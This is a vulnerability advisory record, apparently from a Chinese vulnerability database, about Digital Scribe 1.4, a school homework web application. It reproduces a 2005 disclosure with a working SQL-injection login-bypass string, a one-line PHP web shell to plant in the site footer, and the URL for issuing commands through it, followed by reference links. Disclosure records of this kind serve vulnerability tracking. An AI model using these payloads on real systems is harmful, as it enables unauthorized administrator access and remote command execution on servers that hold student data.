https://cxsecurity.com/issue/WLB-2005090008
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-160

DigitalScribe是一个基于WEB的在线处理学生和家庭工作的软件。DigitalScribe1.4版本中的login.php存在SQL注入漏洞，导致远程攻击者通过用户名参数执行任意SQL指令。

Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution

software:

site: http://www.digital-scribe.org/

description: "Teachers have full control through a web-based interface. Designed
for easy installation and even easier use, the  Digital Scribe  has been used in
thousands of  schools. No teacher  or IT Personnel  needs to  know any  computer
languages in order to install and use this intuitive system.

1) Login Bypass / SQL Injection ************************************************

login as admin typing:

login: " or isnull(1/0) /*
password: [whatever]

2) remote code execution *******************************************************
now you can edit template and leave a backdoor on target system:
at the end of the  footer try this:

<?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?>

then you can launch commands:

http://[target]/[path_to_dscribe]/index.php?cmd=[some_command]

rgod
site: http://rgod.altervista.org
email: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/dscribe14.html
************************************************************************
********

来源:XF
名称:digitalscribe-login-sql-injection(22286)
链接:http://xforce.iss.net/xforce/xfdb/22286
来源:BID
名称:14843
链接:http://www.securityfocus.com/bid/14843
来源:SECUNIA
名称:16841
链接:http://secunia.com/advisories/16841/
来源:MISC
链接:http://rgod.altervista.org/dscribe14.html
来源:BUGTRAQ
名称:20050915DigitalScribev1.4LoginBypass/SQLinjection/remotecodeexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112680124115325&w;=2
来源:OSVDB
名称:19460
链接:http://www.osvdb.org/19460
来源:VUPEN
名称:ADV-2005-1757
链接:http://www.frsirt.com/english/advisories/2005/1757
来源:SECTRACK
名称:1014909
链接:http://securitytracker.com/id?1014909
来源:SREASON
名称:10
链接:http://securityreason.com/securityalert/10